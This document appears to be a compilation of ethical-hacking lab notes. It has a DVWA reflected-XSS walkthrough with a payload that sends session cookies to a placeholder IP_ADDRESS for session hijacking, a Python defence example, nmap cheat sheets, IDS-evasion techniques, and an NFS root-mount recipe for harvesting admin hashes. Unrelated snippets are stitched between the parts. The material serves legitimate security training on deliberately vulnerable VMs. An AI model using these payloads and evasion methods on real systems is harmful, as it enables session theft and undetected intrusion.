metasploitable/dvwa - reflected XSS
Reflected Cross Site Scripting attacks, also known as non-persistent attacks, leverage malicious script off of a web application: the attacker makes an HTTP request that includes malicious data, and then sends the infected URL to its target.
Burp Suite is a great tool to identify XSS vulnerabilities in web applications. Attackers might very well use the Burp Repeater to test various payloads, issuing a request and reviewing each response in comparison with the initial site response. This allows attackers to gain a better context of where the “reflection” of the injected value occurs (which can be within HTML tags, a JavaScript string, etc.) and to test for different input validations.
A common defense against non-persistent attacks is filtering user input and blacklisting or sanitizing specific strings so that they cannot execute. Other defenses include encoding the data on output or placing a Content Security Policy (CSP).
For this demonstration, however, we will use metasploitable2/dvwa, a purposely vulnerable web application, and will not need Burp Suite to test for reflections and input validations, nor have to worry about sanitized inputs.
We’ll start off with a simple one!
First, launch the metasploitable2 VM. Open a browser and browse to your metasploitable IP address; head to the /dvwa/ directory and sign in on the login page with the default credentials.
Once signed in, head to the “XSS reflected” tab. **Don’t forget to change the DVWA Security to “low” if you haven’t already.
The XSS Reflected tab gives us a page where we can input text. Let’s test it out.
Notice how the “pillothecat” request by the client gets the response “Hello pillothecat” from the server. This sort of user interaction potentially allows an XSS vulnerability to be present, because a potential attacker might send in a malicious script, or a script that they shouldn’t be authorized to send.
Hmm. I wonder if we could do something like that for this website?
Let’s test the “ALERT” script -- an alert that generates a pop-up. (Not the most devious, I know, but popups can certainly be annoying!)
input: <script>alert("aaHH")</script>
** Even if you don’t understand scripting languages, that’s okay! There are plenty of open source scripts that you can find, but do try to understand the context of each variable. We can clearly see the boundaries of the script (<script>, </script>), the command alert, followed by the string of text we want to pop up.
Go ahead and enter the script and notice that annoying popup.
Now look over at your URL. Do you see the same script you entered in the URL query parameter?
Maybe it looks a little different, and that’s okay, because the script is now URL-encoded. But either way, this URL can now be sent to a target so that they see the same annoying pop-up that we’ve scripted.
Now imagine a more nefarious script that we can inject into a url request.
Let’s say, for example, stealing our target’s cookies.
Much like the alert popup, we will need to inject code that the user will then interact with. Ideally this script might be hidden away so that the user won’t suspect anything. For example, a script might be within the code of an image of a popular cat meme; when the catchy meme is shared among friends, unbeknownst to the user(s), the forwarded image also runs a script that requests their cookie information be sent to the hacker.
Pretty terrifying!! But don’t worry, today we’ll skip over hiding our script and instead simply inject it into the same input box we did earlier.
Here’s the script to acquire the cookie information: *** don’t forget to replace “IP_ADDRESS” with where you want the information to be sent.
<SCRIPT> var i = new Image(); i.src="http://IP_ADDRESS/" + document.cookie.split('; ')[1];</SCRIPT>
Now, before you hit submit, let’s open our terminal and listen for the request with netcat.
Now hit submit and let’s see what we pick up in our terminal.
Let’s take a close look at the PHPSESSID row. In PHP applications, the user’s session ID is stored in the PHPSESSID cookie. Cookies are characters saved for a user’s web app requests -- they store user information like passwords, search preferences, etc. Now that we have our target’s cookie, we can use it as a means of accessing the site with the target’s credentials.
Let’s test it out!
In a new browser, go to the /dvwa/ home page.
http://”METASPLOITABLE2_IP_ADDRESS”/dvwa/index.php
Notice how the site redirects you to /login.php; this is because we don’t yet have the proper credentials to access the home page.
In order to change this, we can head to “Web Developer” --> “Storage Inspector” from our browser settings.
Under “Cookies”, change the “PHPSESSID” value to the value we intercepted from our target.
Now, if you are still on the login page, try refreshing with the correct home page URL (/dvwa/index.php).
ANNNNND we have successfully logged in with our target’s cookie!!!
nice~~
..
.
WELL, not really nice... obviously, this can be extremely dangerous!!!
If there’s one important takeaway from all this, it is that you should ALWAYS check the links that you click.
Don’t forget, the vulnerability here is the user interaction that triggers the script in the first place. So, watch out for those phishing emails, go only on trusted sites, and of course, HACK ETHICALLY =D
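As an added example (not code from this post, DVWA or Metasploitable), here is the “Hello <name>” reflection in Python beside its hardened form, using the defenses mentioned earlier (output encoding and a CSP) plus an HttpOnly session cookie so that document.cookie has nothing to hand over; the DVWA page path and the session value are assumptions.

```python
"""Reflected XSS on a "Hello <name>" page: the vulnerable reflection beside its
hardened form (output encoding, CSP, HttpOnly session cookie).

Added example, not DVWA's or Metasploitable's code: the handler functions,
the assumed page path and the sample URL are constructed for illustration."""
import html
from urllib.parse import parse_qs, urlsplit

# The two payloads from the post, as constructed sample inputs.
ALERT_PAYLOAD = '<script>alert("aaHH")</script>'
COOKIE_PAYLOAD = ('<SCRIPT> var i = new Image(); i.src="http://IP_ADDRESS/" '
                  "+ document.cookie.split('; ')[1];</SCRIPT>")

# What the address bar shows after submitting the alert payload: the same
# script, percent-encoded inside the ?name= query parameter (path assumed).
SAMPLE_URL = ("http://METASPLOITABLE2_IP_ADDRESS/dvwa/vulnerabilities/xss_r/"
              "?name=%3Cscript%3Ealert%28%22aaHH%22%29%3C%2Fscript%3E")


def name_from_url(url):
    """Pull the name parameter out of a request URL. parse_qs percent-decodes
    it, which is why the encoded link still delivers the original script."""
    query = parse_qs(urlsplit(url).query)
    return query.get("name", [""])[0]


def render_vulnerable(name):
    """DVWA 'low' behaviour: the parameter is pasted into the HTML as-is, so
    a <script> tag inside it is parsed and run by the browser."""
    return "<pre>Hello " + name + "</pre>"


def render_hardened(name):
    """Output encoding: <, >, &, " and ' become entities, so the browser
    displays the text and never treats it as markup."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def hardened_headers(session_id):
    """Response headers that limit the damage even if an encoding bug slips
    through: a CSP that forbids inline script, and a session cookie that
    the post's document.cookie beacon cannot read (HttpOnly)."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "Set-Cookie": f"PHPSESSID={session_id}; HttpOnly; SameSite=Lax",
    }


def reflects_raw_script(page):
    """Does the rendered page still contain an un-encoded <script tag?
    (A crude check, but enough to compare the two renderers.)"""
    return "<script" in page.lower()


def handle(url, hardened):
    """One request end to end; returns (body, headers). The session id is a
    constructed stand-in for the value PHP would issue."""
    name = name_from_url(url)
    if hardened:
        return render_hardened(name), hardened_headers("constructed-session-id")
    return render_vulnerable(name), {"Set-Cookie": "PHPSESSID=constructed-session-id"}


if __name__ == "__main__":
    for mode in (False, True):
        body, headers = handle(SAMPLE_URL, hardened=mode)
        print("hardened" if mode else "vulnerable", "->", body)
        print("   raw script still present:", reflects_raw_script(body), headers)
```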
hacker bitch bridge my network pointto point and now i cant find my default ip address for my lol and im wiping all my computers bitch! #ihatehackers🚫 #ihatehackers #linux #metasploitable2 #metasploitframework
The Green Girl is learning about leveraging the vsftpd back door in her Cisco #CCNACyberOps course using Metasploitable 2
Hacking Cheat Sheets Part 1: Nmap
Here’s a cheat sheet I made for some common nmap commands. The formatting was a bit off, so if you see a bullet point that starts with an f, it’s supposed to be an @ symbol.
nmap:
* The following command checks the state of the most popular ports on the host scanme.nmap.org by launching a TCP port scan: $ nmap scanme.nmap.org
* Nmap begins by converting the hostname to an IPv4 address using DNS. If you wish to use a different DNS server, use --dns-servers <serv1[,serv2],...>, or use -n if you wish to skip this step, as follows: $ nmap --dns-servers 8.8.8.8,8.8.4.4 scanme.nmap.org
* Afterwards, it pings the target address to check if the host is alive. To skip this step use -PN as follows: $ nmap -PN scanme.nmap.org
* Nmap then converts the IPv4 address back to a hostname by using a reverse DNS call. Use -n to skip this step as follows: $ nmap -n scanme.nmap.org
* Finally, it launches a TCP port scan. To specify a different port range, use -p[1-65535], or -p- for all possible TCP ports, as shown in the following command: $ nmap -p1-30 scanme.nmap.org
* Nmap categorizes ports into the following states:
  1. Open: This indicates that an application is listening for connections on this port.
  2. Closed: This indicates that the probes were received but there is no application listening on this port.
  3. Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
  4. Unfiltered: This indicates that the probes were received but a state could not be established.
  5. Open/Filtered: This indicates that the port was filtered or open but Nmap couldn't establish the state.
  6. Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn't establish the state.
* Version detection is one of the most popular features of Nmap. Knowing the exact version of a service is highly valuable for penetration testers who use this service to look for security vulnerabilities, and for system administrators who wish to monitor their networks for any unauthorized changes. Fingerprinting a service may also reveal additional information about a target, such as available modules and specific protocol information.
* $ nmap -sV scanme.nmap.org
* This feature basically works by sending different probes from nmap-service-probes to the list of suspected open ports. The probes are selected based on how likely it is that they can be used to identify a service. There is very detailed documentation on how the service detection mode works, and the file formats used, at http://nmap.org/book/vscan.html
* Nmap has a special flag to activate aggressive detection, namely -A. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Needless to say, this mode sends a lot more probes and is more likely to be detected, but it provides a lot of valuable host information. You can see this by using the following command: # nmap -A <target>
* Finding live hosts in a network is often used by penetration testers to enumerate active targets, and by system administrators to count or monitor the number of active hosts. This is a ping scan: $ nmap -sP 192.168.1.1/24
* ARP requests are used when scanning a local Ethernet network as a privileged user, but you can override this behavior by including the flag --send-ip: # nmap -sP --send-ip 192.168.1.1/24
* Ping scanning does not perform port scanning or service detection, but the Nmap Scripting Engine can be enabled for scripts depending on host rules, such as sniffer-detect and dns-brute: # nmap -sP --script discovery 192.168.1.1/24
* There are situations when a system administrator is looking for infected machines that use a specific port to communicate, or when users are only looking for a specific service or open port and don't really care about the rest. Narrowing down the port ranges used also optimizes performance, which is very important when scanning multiple targets: # nmap -p80 192.168.1.1/24
* There are several accepted formats for the argument -p:
  - Port list: # nmap -p80,443 localhost
  - Port range: # nmap -p1-100 localhost
  - All ports: # nmap -p- localhost
  - Specific ports by protocol: # nmap -pT:25,U:53 <target>
  - Service name: # nmap -p smtp <target>
  - Service name wildcards: # nmap -p smtp* <target>
  - Only ports registered in Nmap services: # nmap -p[1-65535] <target>
* The argument --script sets which NSE scripts should be run with the scan. In this case, when the service scan detects the web server, a parallel thread is initialized for the selected NSE script.
* There are more than 230 scripts available, which perform a wide variety of tasks. The NSE script http-title returns the title of the root document if a web server is detected.
* You can run multiple scripts at once: $ nmap --script http-headers,http-title scanme.nmap.org
* Selecting scripts by category:
  - Run all the scripts in the vuln category: $ nmap -sV --script vuln <target>
  - Run the scripts in the categories version or discovery: $ nmap -sV --script="version,discovery" <target>
  - Run all the scripts except for the ones in the exploit category: $ nmap -sV --script "not exploit" <target>
  - Run all HTTP scripts except http-brute and http-slowloris: $ nmap -sV --script "(http-*) and not(http-slowloris or http-brute)" <target>
* To test new scripts, you simply need to copy them to your /scripts directory and run the following command to update the script database: # nmap --script-updatedb
* NSE script categories:
  - auth: This category is for scripts related to user authentication.
  - broadcast: This is a very interesting category of scripts that use broadcast petitions to gather information.
  - brute: This category is for scripts that help conduct brute-force password auditing.
  - default: This category is for scripts that are executed when a script scan is executed (-sC).
  - discovery: This category is for scripts related to host and service discovery.
  - dos: This category is for scripts related to denial of service attacks.
  - exploit: This category is for scripts that exploit security vulnerabilities.
  - external: This category is for scripts that depend on a third-party service.
  - fuzzer: This category is for NSE scripts that are focused on fuzzing.
  - intrusive: This category is for scripts that might crash something or generate a lot of network noise. Scripts that system administrators may consider intrusive belong to this category.
  - malware: This category is for scripts related to malware detection.
  - safe: This category is for scripts that are considered safe in all situations.
  - version: This category is for scripts that are used for advanced versioning.
  - vuln: This category is for scripts related to security vulnerabilities.
* How to force Nmap to scan using a specified network interface: $ nmap -e <INTERFACE> scanme.nmap.org
* Scanning profiles are a combination of Nmap arguments that can be used to save time and the need to remember argument names when launching an Nmap scan. This recipe is about adding, editing, and deleting a scanning profile in Zenmap. Let's add a new profile for scanning web servers:
  1. Launch Zenmap.
  2. Click on Profile on the main toolbar.
  3. Click on New Profile or Command (Ctrl+P). The Profile Editor will be launched.
  4. Enter a profile name and a description on the Profile tab.
  5. Enable Version detection and disable reverse DNS resolution on the Scan tab.
  6. Enable the following scripts on the Scripting tab: hostmap, http-default-accounts, http-enum, http-favicon, http-headers, http-methods, http-trace, http-php-version, http-robots.txt, http-title
  7. Next, go to the Target tab, click on Ports to scan and enter 80, 443.
  8. Save your changes by clicking on Save Changes.
After using the editor to create our profile, we are left with the following Nmap command: $ nmap -sV -p 80,443 -T4 -n --script http-default-accounts,http-methods,http-php-version,http-robots.txt,http-title,http-trace,http-userdir-enum <target>
Using the Profile wizard, we have enabled service scanning (-sV), set the scanning ports to 80 and 443, set the Timing template to 4, and selected a bunch of HTTP-related scripts to gather as much information as possible from this web server. And we now have this profile saved for some quick scanning without having to type all these flags and options again.
------------------------------------------------------------------------------------
* nmap workshop on webpwnized notes: with this I have metasploitable2 up and running. You can either run netdiscover or the -sn switch for nmap to do a host discovery and see what you have up and running.
1. tcpdump -i eth0 -nn host 10.0.0.100 and host 10.0.0.115
2. This says use interface eth0 with no DNS resolution or friendly names (like http instead of port 80) and to specifically monitor traffic between these two hosts.
3. First, let's start with a SYN scan. You have to be running as root to do this one.
4. nmap -p 80 -sS 10.0.0.115
5. Note the flags: SYN from us and SYN/ACK from them, then we sent an R (RST).
6. Let's change the -sS to -sT; this is a full connect scan and it's what Nmap switches to if you're not root.
7. Note the SYN, SYN/ACK, ACK, then reset.
8. If we stuck with these scans, they are TCP scans; we would be missing out on the goods on UDP.
9. Adding -sU to the mix will do a UDP scan, but this takes a long time.
10. You can decrease the time with -p 1-200.
11. Also test the firewall state with an ACK scan.
12. nmap -p 1-200 -sA 10.0.0.115
13. Looking at tcpdump we see there was a large amount of ports that responded back with an RST, so we know it's listening and responding.
14. You can also use --scanflags <flags>, which lets you specify what flags you want set.
15. Let's do a protocol scan.
16. nmap -sO 10.0.0.115
17. This is checking the IP protocol IDs to see what the victim supports.
18. Takes a while, so go ahead and Ctrl+C it.
19. Keep in mind you can hit v on your keyboard during the scan to raise verbosity, and d for debug info. Shift+V and Shift+D dial it back down.
20. You could have also done it in the command with -vvv (the number of v's is the verbosity level) and -ddd as well.
21. So let's just run a basic nmap on metasploitable2.
22. nmap 10.0.0.115
23. This shows what's open and what service is running based on the port number. This can be misleading, because admins may move services to different ports.
24. If you go to /usr/share/nmap/ and run cat nmap-services | more, you will see what nmap notes as services.
25. So let's go deeper with one in particular, port 3306. It states it's mysql, so let's find out.
26. nmap -sV -p 3306 10.0.0.115
27. This gives the whole version number; this is what you would compare online to see if there's a vulnerability for that specific version.
28. Let's see how these are found out.
29. cd /usr/share/nmap and cat nmap-service-probes | more
30. These list different probes that have data that can be used to compare with the response nmap gets back from a service. There's a ton of probes here, ranging from null scans to bitcoin and antiviruses.
31. Let's see if we can find the mysql probes (q to quit).
32. cat nmap-service-probes | grep mysql
33. You can also scan the top 1000 services based off of this services text file.
34. By adding -F it will scan the top 100, and quickly.
35. nmap -F 10.0.0.115
36. You can also use --top-ports <number of ports>.
37. nmap --top-ports 500 10.0.0.115
38. You can skip port ranges with a comma.
39. nmap -p 21-25,27,29 10.0.0.115
40. You can also specify UDP or TCP.
41. nmap -sS -sU -p U:53,111,137,T:21-25,80 10.0.0.115
42. Now try it without the -sU and you will see that although you specified the UDP ports, it still doesn't scan them without that -sU switch.
43. The same applies if you just did the -sU and omitted the -sS: you will only get the UDP ports.
44. So run both types of scans if you are going to be specifying UDP and TCP ports.
45. You can add -r to have the ports scanned in order, not random.
46. The file to see how nmap determines the OS version is /usr/share/nmap/nmap-os-db.
47. These are basically patterns, and if the nmap response matches one of these patterns it can determine with good certainty that particular OS.
48. So do nmap -O 10.0.0.115 to do the OS scan.
49. You can tweak these scans as well, like --osscan-limit, which basically says if you can't determine what it is, don't bother: nmap -O --osscan-limit 10.0.0.115
50. --osscan-guess is a more aggressive probe: nmap -O --osscan-guess 10.0.0.115
51. http://nmap.org/book/osdetect-methods.html
52. Now let's try to mess with timing.
53. You can use --min-hostgroup if you want to specify a number of hosts to scan at a time; there's also --max-hostgroup.
54. --max-retries caps the number of port scan probe retransmissions.
55. --host-timeout <time> gives up on a target after this long.
56. --scan-delay adjusts when I want to send probes.
57. There are templates that use these parameters when using the -T options.
-T<0-5>: Set timing template (higher is faster)
Speed: T1
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 15000, min 100, max 15000 (round trip times)
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 1
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
Speed: T2
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 1
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
Speed: T3
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
Speed: T4
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 500, min 100, max 1250
  max-scan-delay: TCP 10, UDP 1000, SCTP 10
  parallelism: min 0, max 0
  max-retries: 6, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
Speed: T5
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 250, min 50, max 300
  max-scan-delay: TCP 5, UDP 1000, SCTP 5
  parallelism: min 0, max 0
  max-retries: 2, host-timeout: 900000
  min-rate: 0, max-rate: 0
---------------------------------------------
58. T3 is a good balance.
59. T1 is good when I don't want to be found by an IDS, because it takes so much time in between packets.
60. nmap -T1 -vvv -dd 10.0.0.115
61. This will take forever, so just show students the verbose output of what it's doing.
62. Do the same with the other ones.
63. Reporting options are many.
64. -oN/-oX/-oS/-oG <file>: normal, XML, script kiddie, and grepable format, in that order. With these you need to add the extension to the end of the filename.
65. -oA outputs in all major formats simultaneously.
66. nmap -oA rays-scan 10.0.0.115
67. Make sure you copy over the stylesheet with cp /usr/share/nmap/nmap.xsl /root
68. Also give the XML version a minute or so to finish, then do firefox rays-scan.xml &
69. You would need to send this .xsl file along with the XML file if you send it elsewhere.
70. --resume will resume an aborted scan if you were outputting to a file at the time.
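As an added example (not from the cheat sheet or from Nmap itself), here is a small parser for the grepable -oG format from the reporting options above, used the way the version-detection notes describe for administrators: diffing a baseline scan against a later one to spot ports or service versions that changed. Both scan texts are constructed samples in -oG shape, and the version strings are illustrative rather than a recorded scan.

```python
"""Parse Nmap grepable output (-oG) and diff two scans of the same host.

Added example, not from the cheat sheet or from Nmap. Both scan texts below
are constructed samples in -oG shape; the version strings are illustrative."""
import re

BASELINE = """\
# Nmap scan initiated (constructed sample) as: nmap -sV -oG baseline 10.0.0.115
Host: 10.0.0.115 ()\tStatus: Up
Host: 10.0.0.115 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 3306/open/tcp//mysql//MySQL 5.0.51a-3ubuntu5/\tIgnored State: closed (997)
# Nmap done (constructed sample) -- 1 IP address (1 host up)
"""

CURRENT = """\
# Nmap scan initiated (constructed sample) as: nmap -sV -oG current 10.0.0.115
Host: 10.0.0.115 ()\tStatus: Up
Host: 10.0.0.115 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)/, 3306/open/tcp//mysql//MySQL 5.0.51a-3ubuntu5/, 4444/open/tcp//krb524?///\tIgnored State: closed (997)
# Nmap done (constructed sample) -- 1 IP address (1 host up)
"""

# Port entries are separated by ", " and each starts with a port number.
ENTRY_SPLIT = re.compile(r",\s*(?=\d+/)")


def parse_grepable(text):
    """Return {ip: {(port, proto): (state, service, version)}}.

    -oG writes one tab-separated record per line; only 'Ports:' fields carry
    port data. Each entry is port/state/proto/owner/service/rpc/version/
    (Nmap replaces '/' inside a version string with '|', so splitting on '/'
    is safe)."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        ports = hosts.setdefault(ip, {})
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # 'Status:', 'Ignored State:' and friends
            for entry in ENTRY_SPLIT.split(field[len("Ports:"):].strip()):
                parts = entry.strip().split("/")
                if len(parts) < 7:
                    continue
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                ports[(int(port), proto)] = (state, service, version)
    return hosts


def diff_scans(old, new):
    """Compare two parsed scans. Returns (kind, 'ip:port/proto', detail)
    tuples sorted by host and port: 'added' for a port that now appears,
    'removed' for one that vanished, 'changed' when state, service or
    version differ (detail is then the (before, after) pair)."""
    changes = []
    for ip in sorted(set(old) | set(new)):
        before, after = old.get(ip, {}), new.get(ip, {})
        for key in sorted(set(before) | set(after)):
            label = f"{ip}:{key[0]}/{key[1]}"
            b, a = before.get(key), after.get(key)
            if b is None:
                changes.append(("added", label, a))
            elif a is None:
                changes.append(("removed", label, b))
            elif b != a:
                changes.append(("changed", label, (b, a)))
    return changes


if __name__ == "__main__":
    old, new = parse_grepable(BASELINE), parse_grepable(CURRENT)
    for kind, label, detail in diff_scans(old, new):
        print(f"{kind:8s} {label:22s} {detail}")
```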
nmap scripting
* It's based on Lua.
* You can do network discovery, more sophisticated version detection, vulnerability detection, backdoor detection, and some exploitation.
* Script categories:
  - auth: credentials on a target system
  - broadcast: discovery of hosts not listed on the command line by broadcasting on the local network
  - default: if you write a script for this category it gets run when you do the -A option
  - discovery: discover more info (directory services, SNMP, public registries, etc.)
  - dos: crash a service
  - exploit: exploit a vulnerability
  - fuzzer: send server software unexpected input
  - intrusive: high risk, things that can crash services
  - safe: won't crash a service
  - version: version detection
The Nmap Scripting Engine (NSE)
1. How to specify which scripts to run.
2. How to use wildcards.
3. How scripts work.
4. Overview of the scripts available.
5. Demonstration of select scripts.
6. Discuss some scripts helpful in your job.
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma separated list of script-files or script-categories.
* A good methodology when you start pentesting a network is:
  PLUG INTO THE NETWORK AND CREATE A SUBNET LIST
  1. ifconfig
  2. /etc/resolv.conf: this is where their DNS servers are listed, and a lot of companies tend to put their DNS servers in the same subnet as their domain controllers
  3. netdiscover
  4. wireshark
  5. dig
  PING SCAN TO CREATE A LIST OF LIVE IPS
  1. nmap -sP -PL
  SYN SCAN USING TIMING AND OTHER EVASION TECHNIQUES, ONE PORT AT A TIME
  1. cat hostlist.txt | sort -R | nmap -sS -p 389 -oG myscan -iL - (sort -R is so it will go at random, so an IDS won't pick up sequential scans)
  USE NMAP SCRIPTS AGAINST THE HOSTS ONE BY ONE IN EACH PORT.TXT FILE
  1. nmap -Pn -n --open -p21 --script ftp-anon,ftp-bounce,ftp-libopie -iL 21.txt
* Don't throw a script at a network until you know what it does. Find it on nmap.org/nsedoc/scripts/
* Help files would be nmap --script-help "ftp-*"
* Let's do some examples:
1. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p21 --script=banner,ftp-anon,ftp-bounce 10.0.0.115
2. Scan delay is the delay between each packet; -g spoofs the source port (most port 53 traffic will be let through a firewall); no DNS or ARP.
3. nmap --script-help "ssh-*" (also do it without the - to get more scripts)
4. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p22 --script=sshv1,ssh2-enum-algos
5. nmap --script-help "smtp-*"
6. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p25 --script=smtp-brute,smtp-enum-users 10.0.0.115
7. nmap --script-help "dns-*"
8. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p53 --script=dns-cache-snoop,dns-service-discovery,dns-update,dns-zone-transfer,dns-recursion 10.0.0.115
9. The DNS cache thing is something most don't realize: DNS servers love to cache domains, and the dns-cache-snoop script has about 100 domains like facebook, wikipedia, etc., so modify the NSE for that with other domains.
10. cd /usr/share/nmap/scripts and ls -lah | grep dhcp
11. nmap --script=broadcast-dhcp-discover.nse -p67 --open 10.0.0.0/24
12. This one can show me an IP address that can be used by me.
13. nmap --script-help "ms-sql-*"
14. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p T:1433,U:1434 --script=ms-sql-info,ms-sql-empty-password 10.0.0.115 (can also replace this with mysql to be used against metasploitable)
15. nmap --script-help "nfs-*"
16. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p111 --script=rpcinfo,nfs-ls,nfs-showmount,nfs-statfs 10.0.0.115 (note the export of / to root; so show the students how this is dangerous by:)
17. mkdir /mnt/raystemp
18. mount -t nfs 10.0.0.115:/ /mnt/raystemp/ -o nolock
19. cd /mnt/raystemp/
20. ls, and look at all the access you have, because some let you mount to root.
21. The company may have their golden images for their image deployment stored here, and you can download it, install it and rip the admin hashes.
22. nmap --script-help "smb-*"
23. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p139,445 --script="smb-enum*",smb-os-discovery,smb-security-mode,smb-check-vulns --script-args safe=1 10.0.0.115
24. nmap --script-help "http-*"
25. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p80,443,8000,8080,8443 --script=http-date,http-enum,http-favicon,http-headers,http-open-proxy,http-php-version,http-robots.txt,http-title,http-trace,http-vhosts,http-vmware-path-vuln,citrix-enum-apps-xml,citrix-enum-servers-xml --stats-every 30s 10.0.0.115
26. nmap --script-help "ldap-*"
27. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p389 --script=ldap-rootdse 10.0.0.115
28. nmap --script-help "ssl-*"
29. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p443 --script=banner,ssl-cert,ssl-enum-ciphers,sslv2,ssl-heartbleed 10.0.0.115
30. By the way, the reason for all these scans is that a lot of the vulnerability scanners out there produce false positives, so doing these scans is a great secondary check.
31. IP geolocation stuff can also be done from nmap.
32. nmap -Pn -p80 --script ip-geolocation-* irongeek.com
33. GitHub has a lot of custom scripts.
34. So to install an NSE script, you download one like https://github.com/SpiderLabs/Nmap-Tools/blob/master/NSE/http-screenshot.nse and then copy it over to /usr/local/share/nmap/scripts/; after that's done you run nmap --script-updatedb
35. git clone git://github.com/SpiderLabs/Nmap-Tools.git
36. cd Nmap-Tools/NSE/
37. cp http-screenshot.nse /usr/share/nmap/scripts
38. nmap --script-updatedb
metasploit and nmap
* Some of the common database commands are:
1. creds - list all the credentials in the database
2. db_connect - connect to an existing database
3. db_disconnect
4. db_export - export a file containing the contents of the database
5. db_import - import a scan result file
6. db_nmap - executes nmap and records the output automatically
7. db_rebuild_cache - rebuilds the database-stored module cache
8. db_status
9. hosts - lists all hosts in the database
10. loot - lists all the loot in the database
11. notes - lists all notes in the database
12. services - lists all the services in the db
13. vulns - lists all the vulns
14. workspace - switch between database workspaces
* So you can scan directly into the database when you do nmap by doing:
1. db_nmap -n -A 10.0.0.115
2. Now you can type hosts and see what you have for hosts.
3. hosts -u will tell you the hosts that responded.
4. If you want to only get the info about a certain port it would be services -p 80 -u
5. And when I do a metasploit exploit module, I can say services -p 21 -R; this automatically sets all the rhosts to this ip. Keep in mind this is only for rhosts, not rhost.
6. So do services -p 21 -R
7. Then search port scanner and grab the ftpbounce scanner and use the module.
8. show options, and it should already have the rhosts option set (unset unsets it).
9. workspace -h
10. All the commands for the database have help files, so hosts -h, services -h, etc.
11. You can also query the database for the different columns and such, like:
12. hosts -c address,os_flavor
13. hosts -c address,os_flavor -S Linux
14. services -c name,info 10.0.0.115
15. services -S Unr
16. services -c port,proto,state -p 80-82
17. services -s http -c port 10.0.0.115
18. Now for exporting:
19. services -s http -c port 10.0.0.115 -o /root/rays.csv
20. hosts -S Linux -o /root/rayshosts.csv
Evasion techniques
1. SYN scan is still the best stealthy scan; always do one.
2. Source port manipulation: DNS TCP 53, FTP TCP 20, Kerberos TCP or UDP 88 and DHCP UDP 67. The syntax would be --source-port <port number> or -g <port number>.
3. This doesn't work with TCP connect scans, DNS requests, OS version scanning or script scanning.
4. Fragmentation: -f (fragment packets) or --mtu (use the specified MTU). Splits up the TCP header over several packets to make it harder for packet filters. You can specify this option once and split the packets into eight bytes or less after the IP header. You can specify -f again to use 16 bytes per fragment. Generally not supported for connect scans, FTP bounce, version detection and the scripting engine.
5. Scan delay: --scan-delay <time> or --max-scan-delay <time>. Wait at least the given amount of time between each probe. Evades threshold-based IDS and IPS. Nmap tries to detect rate limiting and adjust the scan delay accordingly. A low --max-scan-delay can speed up nmap; most pentesters go with 3 sec.
6. Decoy scanning: -D <decoy1>,<decoy2>. Basically you're cloaking a scan with decoys. It makes it appear to the remote host that the hosts you specify as decoys are scanning the target network too. This makes the scan less obvious to various network monitoring systems. Hosts you use as decoys should be up, and use IP addresses instead of names. Can be defeated through router tracing, response dropping and other active mechanisms. Decoys work with the initial ping scan (using ICMP, SYN, ACK), the actual port scanning phase and remote OS detection. They do not work with version detection scans or TCP connect scans.
7. Data length: --data-length <number> (append random data to sent packets). One way that an IDS finds that it's nmap in play is its default data length signature; that's where this comes into play. TCP packets are generally 40 bytes and ICMP echo requests are just 28. Append the given number of random bytes to most of the packets it sends and don't use any protocol-specific payloads. Adds extra padding to the packet, making it look less like a scan packet and more like a legitimate packet.
8. Another evasion technique is to do several scans of the target; break your scans up into chunks of "ports of interest".
9. Most IDS/IPS alert on scans of more than 5 ports.
10. Layer your source-obfuscation techniques (decoys, timing, fragmentation, data length, etc.).
11. Keep your scan time to a minimum by breaking scans into multiple jobs.
SecGen - Create Randomly Insecure VMs
SecGen creates vulnerable virtual machines, lab environments, and hacking challenges, so students can learn security penetration testing techniques. Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events. The latest version is available at:…
Kali Linux Network Scanning Cookbook
